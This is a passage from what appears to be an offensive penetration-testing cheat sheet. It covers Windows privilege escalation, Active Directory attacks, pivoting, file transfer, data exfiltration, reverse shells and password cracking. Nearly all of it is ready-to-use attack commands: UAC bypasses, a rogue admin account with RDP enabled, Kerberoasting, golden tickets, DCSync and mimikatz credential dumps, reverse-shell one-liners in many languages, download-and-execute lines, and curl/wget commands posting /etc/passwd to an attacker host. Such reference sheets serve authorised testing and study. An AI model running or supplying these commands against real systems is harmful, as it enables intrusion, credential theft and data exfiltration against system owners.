mimikatz dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<GUID>
# Search for passwords
findstr /SI /M "password" *.xml *.ini *.txt *.cfg *.config
findstr /spin "password" *.*
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
dir /s /b *pass* *cred* *vnc* *.config 2>nul
5.8 UAC Bypass
# Check UAC status
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
# fodhelper.exe bypass
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\temp\shell.exe" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe
# eventvwr.exe bypass
reg add HKCU\Software\Classes\mscfile\shell\open\command /d "C:\temp\shell.exe" /f
eventvwr.exe
5.9 Kernel Exploits
# Gather info
systeminfo
wmic qfe list brief
# Run exploit suggester
python3 wes.py systeminfo.txt
# Common exploits
# MS16-032 - Secondary Logon Handle (Windows 7-10, Server 2008-2012)
# MS17-010 - EternalBlue (Windows 7, Server 2008)
# CVE-2019-1388 - Certificate dialog elevation
# CVE-2021-1732 - Win32k elevation
# CVE-2021-36934 - HiveNightmare/SeriousSAM
# CVE-2021-34527 - PrintNightmare
5.10 Add User & Enable RDP
net user hacker Password123! /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /add
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
6. ACTIVE DIRECTORY
6.1 AD Enumeration
From Linux (Unauthenticated)
enum4linux -a <DC_IP>
rpcclient -U "" -N <DC_IP>
ldapsearch -x -H ldap://<DC_IP> -b "dc=<DC1>,dc=<DC2>"
crackmapexec smb <DC_IP> -u '' -p ''
kerbrute userenum -d <DOMAIN> --dc <DC_IP> /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
From Linux (Authenticated)
bloodhound-python -u <USER> -p '<PASS>' -ns <DC_IP> -d <DOMAIN> -c All
ldapdomaindump <DC_IP> -u '<DOMAIN>\<USER>' -p '<PASS>'
crackmapexec smb <DC_IP> -u <USER> -p '<PASS>' --users
crackmapexec smb <DC_IP> -u <USER> -p '<PASS>' --groups
crackmapexec smb <DC_IP> -u <USER> -p '<PASS>' --shares
crackmapexec smb <DC_IP> -u <USER> -p '<PASS>' --pass-pol
crackmapexec smb <CIDR> -u <USER> -p '<PASS>'
impacket-GetADUsers -all <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP>
From Windows (PowerView)
Import-Module .\PowerView.ps1
Get-Domain
Get-DomainSID
Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
Get-DomainController
Get-DomainUser | Select-Object samaccountname,description,memberof
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Get-DomainUser -AdminCount | Select-Object samaccountname
Get-DomainGroup | Select-Object samaccountname
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Enterprise Admins"
Get-DomainComputer | Select-Object name,operatingsystem,dnshostname
Get-DomainComputer -Ping
Find-DomainShare
Find-DomainShare -CheckShareAccess
Find-InterestingDomainShareFile -Include *passwords*
Find-InterestingDomainAcl -ResolveGUIDs
Get-DomainObjectAcl -Identity <USER> -ResolveGUIDs
Get-DomainGPO | Select-Object displayname
Get-DomainGPOLocalGroup
Get-DomainTrust
Get-DomainTrustMapping
Get-ForestDomain
Get-ForestTrust
Find-LocalAdminAccess -Verbose
Find-DomainUserLocation
Test-AdminAccess -ComputerName <COMPUTER>
Get-NetLoggedon -ComputerName <COMPUTER>
Get-NetSession -ComputerName <COMPUTER>
From Windows (AD Module)
Import-Module ActiveDirectory
Get-ADDomain
Get-ADUser -Filter * -Properties *
Get-ADUser -Filter 'Description -like "*password*"' -Properties Description
Get-ADComputer -Filter * -Properties *
Get-ADGroup -Filter *
Get-ADGroupMember "Domain Admins"
Get-ADTrust -Filter *
(Get-ADForest).Domains
BloodHound Collection
.\SharpHound.exe --CollectionMethod All
.\SharpHound.exe -c All --LdapUsername <USER> --LdapPassword <PASS> --domain <DOMAIN>
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
6.2 Kerberos Attacks
AS-REP Roasting (No Pre-Authentication)
impacket-GetNPUsers <DOMAIN>/ -usersfile users.txt -dc-ip <DC_IP> -format hashcat
impacket-GetNPUsers <DOMAIN>/<USER>:<PASS> -request -dc-ip <DC_IP>
hashcat -m 18200 -a 0 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Kerberoasting
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -outputfile kerberoast.txt
hashcat -m 13100 -a 0 kerberoast.txt /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast.txt
.\Rubeus.exe kerberoast /outfile:kerberoast.txt
Invoke-Kerberoast | fl
Golden Ticket
impacket-secretsdump <DOMAIN>/<ADMIN>:<PASS>@<DC_IP> -just-dc-user krbtgt
impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec <DOMAIN>/Administrator@<DC_HOSTNAME> -k -no-pass
mimikatz
Silver Ticket
impacket-ticketer -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SPN> <USER>
export KRB5CCNAME=<USER>.ccache
impacket-psexec <DOMAIN>/<USER>@<TARGET> -k -no-pass
mimikatz
6.3 Credential Attacks
Pass-the-Hash
impacket-psexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<RHOST>
impacket-wmiexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<RHOST>
impacket-smbexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<RHOST>
impacket-atexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<RHOST> "whoami"
evil-winrm -i <RHOST> -u <USER> -H <NT_HASH>
crackmapexec smb <RHOST> -u <USER> -H <NT_HASH> -x "whoami"
xfreerdp /u:<USER> /pth:<NT_HASH> /d:<DOMAIN> /v:<RHOST>
pth-winexe -U <DOMAIN>/<USER>%:<NT_HASH> //<RHOST> cmd.exe
Pass-the-Ticket
impacket-ticketer -nthash <HASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN> <USER>
export KRB5CCNAME=<USER>.ccache
impacket-psexec <DOMAIN>/<USER>@<TARGET> -k -no-pass
mimikatz
mimikatz
klist
PsExec.exe \\<TARGET> cmd
Overpass-the-Hash
mimikatz
net use \\<DC>
klist
PsExec.exe \\<TARGET> cmd.exe
impacket-getTGT <DOMAIN>/<USER> -hashes :<NT_HASH>
export KRB5CCNAME=<USER>.ccache
impacket-psexec <DOMAIN>/<USER>@<TARGET> -k -no-pass
DCSync
impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP>
impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-ntlm
impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user Administrator
impacket-secretsdump -hashes :<NT_HASH> <DOMAIN>/<USER>@<DC_IP>
mimikatz
mimikatz
6.4 Lateral Movement
PSExec
impacket-psexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-psexec <DOMAIN>/<USER>@<RHOST> -hashes :<NT_HASH>
WMIExec
impacket-wmiexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-wmiexec <DOMAIN>/<USER>@<RHOST> -hashes :<NT_HASH>
SMBExec
impacket-smbexec <DOMAIN>/<USER>:<PASS>@<RHOST>
ATExec
impacket-atexec <DOMAIN>/<USER>:<PASS>@<RHOST> "command"
Evil-WinRM
evil-winrm -i <RHOST> -u <USER> -p '<PASS>'
evil-winrm -i <RHOST> -u <USER> -H <NT_HASH>
PowerShell Remoting
$SecPass = ConvertTo-SecureString '<PASS>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPass)
Invoke-Command -ComputerName <TARGET> -Credential $Cred -ScriptBlock {whoami}
Enter-PSSession -ComputerName <TARGET> -Credential $Cred
DCOM
$com = [activator]::CreateInstance([type]::GetTypeFromProgId("MMC20.Application.1", "<TARGET>"))
$com.Document.ActiveView.ExecuteShellCommand("cmd", $null, "/c <COMMAND>", "7")
6.5 ACL Abuse
ForceChangePassword
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force) -Verbose
net rpc password <TARGET_USER> 'NewPassword123!' -U <DOMAIN>/<USER>%<PASS> -S <DC_IP>
GenericAll on User
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)
Set-DomainObject -Identity <TARGET_USER> -Set @{serviceprincipalname='fake/YOURSERVICE'}
GenericWrite
Set-DomainObject -Identity <TARGET_USER> -Set @{serviceprincipalname='fake/YOURSERVICE'}
WriteDACL
Add-DomainObjectAcl -TargetIdentity "DC=<DOMAIN>,DC=<TLD>" -PrincipalIdentity <USER> -Rights DCSync
6.6 NTLM Relay & Poisoning
Responder (LLMNR/NBT-NS Poisoning)
responder -I <INTERFACE> -dwPv
hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt
NTLM Relay
crackmapexec smb <CIDR> --gen-relay-list relay_targets.txt
impacket-ntlmrelayx -tf relay_targets.txt -smb2support
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -e shell.exe
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c "whoami"
python3 PetitPotam.py <LISTENER_IP> <DC_IP>
python3 printerbug.py <DOMAIN>/<USER>:<PASS>@<DC_IP> <LISTENER_IP>
6.7 AD Certificate Services (ADCS)
certipy find -u <USER>@<DOMAIN> -p '<PASS>' -dc-ip <DC_IP> -vulnerable
certipy req -u <USER>@<DOMAIN> -p '<PASS>' -ca <CA_NAME> -template <TEMPLATE> -upn administrator@<DOMAIN> -dc-ip <DC_IP>
certipy auth -pfx administrator.pfx -dc-ip <DC_IP>
certipy template -u <USER>@<DOMAIN> -p '<PASS>' -template <TEMPLATE> -save-old
certipy req -u <USER>@<DOMAIN> -p '<PASS>' -ca <CA_NAME> -template <TEMPLATE> -upn administrator@<DOMAIN>
certipy auth -pfx administrator.pfx
certipy relay -ca <CA_IP> -template DomainController
python3 PetitPotam.py <LISTENER_IP> <DC_IP>
6.8 Zerologon (CVE-2020-1472)
python3 zerologon_tester.py <DC_NAME> <DC_IP>
python3 set_empty_pw.py <DC_NAME> <DC_IP>
impacket-secretsdump -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 '<DOMAIN>/<DC_NAME>$@<DC_IP>'
6.9 Password Spraying
crackmapexec smb <DC_IP> -u users.txt -p '<PASS>' --continue-on-success
crackmapexec smb <DC_IP> -u users.txt -p passwords.txt --no-bruteforce
kerbrute passwordspray -d <DOMAIN> --dc <DC_IP> users.txt '<PASS>'
spray.sh -smb <DC_IP> users.txt '<PASS>' 1 1 <DOMAIN>
.\Spray-Passwords.ps1 -Pass '<PASS>' -Admin
7. PIVOTING & TUNNELING
7.1 SSH Tunneling
Local Port Forward
ssh -N -L <LPORT>:<TARGET>:<RPORT> <USER>@<PIVOT>
ssh -N -L 8080:10.10.10.10:80 user@pivot
ssh -N -L 0.0.0.0:<LPORT>:<TARGET>:<RPORT> <USER>@<PIVOT>
Remote Port Forward
ssh -N -R <LPORT>:localhost:<RPORT> <USER>@<LHOST>
ssh -N -R 9090:localhost:3306 user@attacker
Dynamic Port Forward (SOCKS Proxy)
ssh -N -D 9050 <USER>@<PIVOT>
proxychains nmap -sT -Pn <INTERNAL_TARGET>
proxychains curl http://<INTERNAL_TARGET>
SSH Config (proxychains.conf)
strict_chain
proxy_dns
[ProxyList]
socks5 127.0.0.1 9050
7.2 Chisel
./chisel server -p 8000 --reverse
./chisel client <LHOST>:8000 R:socks
./chisel client <LHOST>:8000 R:<LPORT>:<TARGET>:<RPORT>
./chisel client 10.10.14.5:8000 R:3306:127.0.0.1:3306
./chisel server -p 9999 --socks5
./chisel client <RHOST>:9999 socks
7.3 Ligolo-ng
./proxy -selfcert -laddr 0.0.0.0:11601
./agent -connect <LHOST>:11601 -ignore-cert
>> session
>> [select session]
>> start
sudo ip route add <INTERNAL_CIDR> dev ligolo
7.4 Socat
socat TCP-LISTEN:<LPORT>,fork TCP:<TARGET>:<RPORT>
socat TCP-LISTEN:<LPORT>,fork TCP:<LHOST>:<LPORT2>
socat OPENSSL-LISTEN:<LPORT>,cert=cert.pem,verify=0,fork TCP:<TARGET>:<RPORT>
7.5 SSHuttle
sshuttle -r <USER>@<PIVOT> <INTERNAL_CIDR>
sshuttle -r user@10.10.10.10 10.10.20.0/24
sshuttle -r <USER>@<PIVOT> <INTERNAL_CIDR> --ssh-cmd "ssh -i id_rsa"
sshuttle -r <USER>@<PIVOT> <INTERNAL_CIDR> -x <PIVOT_IP>
7.6 Port Forwarding (Windows)
Netsh
netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<TARGET>
netsh interface portproxy show all
netsh interface portproxy delete v4tov4 listenport=<LPORT> listenaddress=0.0.0.0
Plink (PuTTY CLI)
plink.exe -ssh -l <USER> -pw <PASS> -R <LPORT>:127.0.0.1:<RPORT> <LHOST>
meterpreter > run autoroute -s <INTERNAL_CIDR>
background
use auxiliary/server/socks_proxy
set SRVPORT 9050
run -j
7.8 Double Pivot
ssh -J <USER>@<PIVOT1> <USER>@<PIVOT2>
./chisel client <LHOST>:8000 R:socks
./chisel client <PIVOT1>:8001 R:socks
8. FILE TRANSFER METHODS
8.1 Linux (Attacker → Target)
HTTP
python3 -m http.server 80
python3 -m http.server 8000
php -S 0.0.0.0:8000
ruby -run -e httpd . -p 8000
wget http://<LHOST>/file -O /tmp/file
curl http://<LHOST>/file -o /tmp/file
curl http://<LHOST>/file | bash
Netcat
nc -lvnp <PORT> > file
nc <RHOST> <PORT> < file
cat file | nc <RHOST> <PORT>
nc -lvnp <PORT> | pv > file
SCP
scp file <USER>@<RHOST>:/tmp/file
scp <USER>@<RHOST>:/tmp/file ./file
scp -i id_rsa file <USER>@<RHOST>:/tmp/file
Base64
base64 -w 0 file > file.b64
cat file | base64 -w 0
echo '<BASE64_STRING>' | base64 -d > file
8.2 Windows (Attacker → Target)
PowerShell
Invoke-WebRequest -Uri http://<LHOST>/file -OutFile C:\temp\file
(New-Object Net.WebClient).DownloadFile('http://<LHOST>/file', 'C:\temp\file')
IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>/script.ps1')
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://<LHOST>/script.ps1')
Invoke-WebRequest -Uri http://<LHOST>/upload -Method POST -InFile C:\temp\file
(New-Object Net.WebClient).UploadFile('http://<LHOST>/upload', 'C:\temp\file')
Certutil
certutil.exe -urlcache -split -f http://<LHOST>/file C:\temp\file
Bitsadmin
bitsadmin /transfer job /download /priority high http://<LHOST>/file C:\temp\file
SMB
impacket-smbserver share $(pwd) -smb2support
impacket-smbserver share $(pwd) -smb2support -username <USER> -password <PASS>
copy \\<LHOST>\share\file C:\temp\file
xcopy \\<LHOST>\share\file C:\temp\file
net use Z: \\<LHOST>\share /user:<USER> <PASS>
FTP
python3 -m pyftpdlib -p 21 -w
ftp <LHOST>
ftp> get file
Windows Download Script (cmd only)
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo dim http >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo http.Open "GET", strUrl, False >> wget.vbs
echo http.Send >> wget.vbs
echo Set ADO = CreateObject("ADODB.Stream") >> wget.vbs
echo ADO.Open >> wget.vbs
echo ADO.Type = 1 >> wget.vbs
echo ADO.Write http.ResponseBody >> wget.vbs
echo ADO.SaveToFile StrFile, 2 >> wget.vbs
cscript wget.vbs http://<LHOST>/file file
Base64 (Linux → Windows)
base64 -w 0 file
[System.Convert]::FromBase64String('<BASE64>') | Set-Content -Path C:\temp\file -Encoding Byte
[IO.File]::WriteAllBytes("C:\temp\file", [Convert]::FromBase64String('<BASE64>'))
Base64 (Windows → Linux)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\temp\file"))
certutil -encode file file.b64
echo '<BASE64>' | base64 -d > file
8.4 Exfiltration
python3 -m uploadserver 8000
curl -X POST http://<LHOST>:8000/upload -F 'files=@/etc/passwd'
wget --post-file=/etc/passwd http://<LHOST>:8000/upload
9. REVERSE SHELLS
9.1 One-Liners
Bash
bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
0<&196;exec 196<>/dev/tcp/<LHOST>/<LPORT>; sh <&196 >&196 2>&196
sh -i >& /dev/udp/<LHOST>/<LPORT> 0>&1
Python
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("<LHOST>",<LPORT>));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
python.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('<LHOST>',<LPORT>));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()"
PHP
php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<LHOST>",<LPORT>);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Perl
perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby
ruby -rsocket -e'f=TCPSocket.open("<LHOST>",<LPORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh <LHOST> <LPORT>
nc -e cmd.exe <LHOST> <LPORT>
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f
Ncat
ncat <LHOST> <LPORT> -e /bin/bash
ncat --udp <LHOST> <LPORT> -e /bin/bash
Socat
socat file:`tty`,raw,echo=0 TCP-L:<LPORT>
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST>:<LPORT>
PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -e <BASE64_ENCODED_COMMAND>
Node.js
(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);var client=new net.Socket();client.connect(<LPORT>,"<LHOST>",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();
Golang
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","<LHOST>:<LPORT>");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('<LHOST>','<LPORT>');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Awk
awk 'BEGIN {s="/inet/tcp/0/<LHOST>/<LPORT>";while(42){do{printf "shell>"|&s;s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit")close(s)}}' /dev/null
OpenSSL (Encrypted)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port <LPORT>
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <LHOST>:<LPORT> > /tmp/s; rm /tmp/s
Telnet
telnet <LHOST> <LPORT> | /bin/sh | telnet <LHOST> <LPORT2>
9.2 Msfvenom Payloads
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell32.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f elf -o shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f elf -o shell32
msfvenom -p php/reverse_php LHOST=<LHOST> LPORT=<LPORT> -f raw > shell.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f war -o shell.war
msfvenom -p cmd/unix/reverse_python LHOST=<LHOST> LPORT=<LPORT> -f raw > shell.py
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f python -b '\x00'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f c -b '\x00'
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f python -b '\x00'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o shell.msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o evil.dll
msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f hta-psh -o evil.hta
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f aspx -o shell.aspx
9.3 Shell Stabilization
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo; fg
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <ROWS> columns <COLS>
/usr/bin/script -qc /bin/bash /dev/null
rlwrap nc -lvnp <LPORT>
10. PASSWORD ATTACKS
10.1 Online Brute Force
Hydra
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt ssh://<RHOST> -t 4
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://<RHOST> -t 4
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt ftp://<RHOST>
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <RHOST> http-get /path
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <RHOST> http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt smb://<RHOST>
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt rdp://<RHOST>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<RHOST>
hydra -l sa -P /usr/share/wordlists/rockyou.txt mssql://<RHOST>
hydra -P /usr/share/wordlists/rockyou.txt vnc://<RHOST> -s 5900
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <RHOST> winrm
Medusa
medusa -h <RHOST> -u <USER> -P /usr/share/wordlists/rockyou.txt -M ssh -t 4
medusa -h <RHOST> -u <USER> -P /usr/share/wordlists/rockyou.txt -M smbnt
CrackMapExec
crackmapexec smb <RHOST> -u <USER> -p /usr/share/wordlists/rockyou.txt
crackmapexec smb <RHOST> -u users.txt -p '<PASS>' --continue-on-success
crackmapexec winrm <RHOST> -u <USER> -p /usr/share/wordlists/rockyou.txt
10.2 Offline Cracking
Hash Identification
hashid '<HASH>'
hash-identifier
hashcat --example-hashes | grep -B 1 '<PARTIAL_HASH>'
Hashcat
hashcat -m 0 hash.txt wordlist.txt
hashcat -m 100 hash.txt wordlist.txt
hashcat -m 1400 hash.txt wordlist.txt
hashcat -m 1000 hash.txt wordlist.txt
hashcat -m 3200 hash.txt wordlist.txt
hashcat -m 1800 hash.txt wordlist.txt
hashcat -m 500 hash.txt wordlist.txt
hashcat -m 5600 hash.txt wordlist.txt
hashcat -m 13100 hash.txt wordlist.txt
hashcat -m 18200 hash.txt wordlist.txt
hashcat -m 22000 hash.txt wordlist.txt
hashcat -m 16800 hash.txt wordlist.txt
hashcat -m 11600 hash.txt wordlist.txt
hashcat -m 13400 hash.txt wordlist.txt
hashcat -m 1500 hash.txt wordlist.txt
hashcat -m 1000 hash.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 1000 hash.txt wordlist.txt -r /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
hashcat -m 1000 hash.txt -a 3 ?u?l?l?l?l?d?d?d
hashcat -m 1000 hash.txt -a 3 ?a?a?a?a?a?a
John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --format=raw-md5 --wordlist=wordlist.txt hash.txt
john --format=nt --wordlist=wordlist.txt hash.txt
john --show hash.txt
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john --wordlist=wordlist.txt unshadowed.txt
ssh2john id_rsa > id_rsa.hash
zip2john file.zip > zip.hash
rar2john file.rar > rar.hash
keepass2john db.kdbx > keepass.hash
pdf2john.pl file.pdf > pdf.hash
gpg2john file.gpg > gpg.hash
office2john.py file.docx > office.hash
pfx2john.py cert.pfx > pfx.hash
10.3 Wordlist Generation
cewl http://<RHOST> -m 6 -w wordlist.txt
cewl http://<RHOST> -m 6 -w wordlist.txt --with-numbers
crunch 8 8 -t ,@@^^@@, -o wordlist.txt
username-anarchy -i fullnames.txt -o usernames.txt
john --wordlist=wordlist.txt --rules --stdout > mutated.txt
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule wordlist.txt > mutated.txt
11. POST-EXPLOITATION
11.1 Mimikatz (Windows)
# Load
mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
# Dump credentials
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
mimikatz # sekurlsa::kerberos
mimikatz # sekurlsa::msv
mimikatz # sekurlsa::credman
# SAM dump
mimikatz # lsadump::sam
mimikatz # lsadump::secrets
mimikatz # lsadump::cache
# DCSync
mimikatz # lsadump::dcsync /domain:<DOMAIN> /user:Administrator
mimikatz # lsadump::dcsync /domain:<DOMAIN> /all /csv
# Kerberos tickets
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::list /export
# Pass-the-Hash
mimikatz # sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:cmd.exe
# Golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<SID> /krbtgt:<HASH> /ptt
# Silver ticket
mimikatz # kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /target:<TARGET> /service:<SVC> /rc4:<HASH> /ptt
11.2 Impacket (Linux → Windows)
impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-secretsdump <DOMAIN>/<USER>@<RHOST> -hashes :<NT_HASH>
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
impacket-psexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-wmiexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-smbexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-atexec <DOMAIN>/<USER>:<PASS>@<RHOST> "command"
impacket-dcomexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request
impacket-GetNPUsers <DOMAIN>/ -usersfile users.txt -dc-ip <DC_IP>
impacket-getTGT <DOMAIN>/<USER>:<PASS>
impacket-getST <DOMAIN>/<USER>:<PASS> -spn <SPN> -impersonate Administrator
impacket-ntlmrelayx -tf targets.txt -smb2support
11.3 Linux Post-Exploitation
cat /etc/passwd
cat /etc/shadow
cat /etc/ssh/sshd_config
find / -name "*.conf" -exec grep -l "password" {} \; 2>/dev/null
find / -name id_rsa 2>/dev/null
cat ~/.bash_history
cat ~/.mysql_history
env | grep -i pass
ip a
ip route
ss -tulnp
arp -a
cat /etc/hosts
cat /etc/resolv.conf
dpkg -l
rpm -qa
pip list
pip3 list
ps auxwww
systemctl list-units --type=service --state=running
tar czf /tmp/loot.tar.gz /home/ /etc/shadow /etc/passwd /root/.ssh/
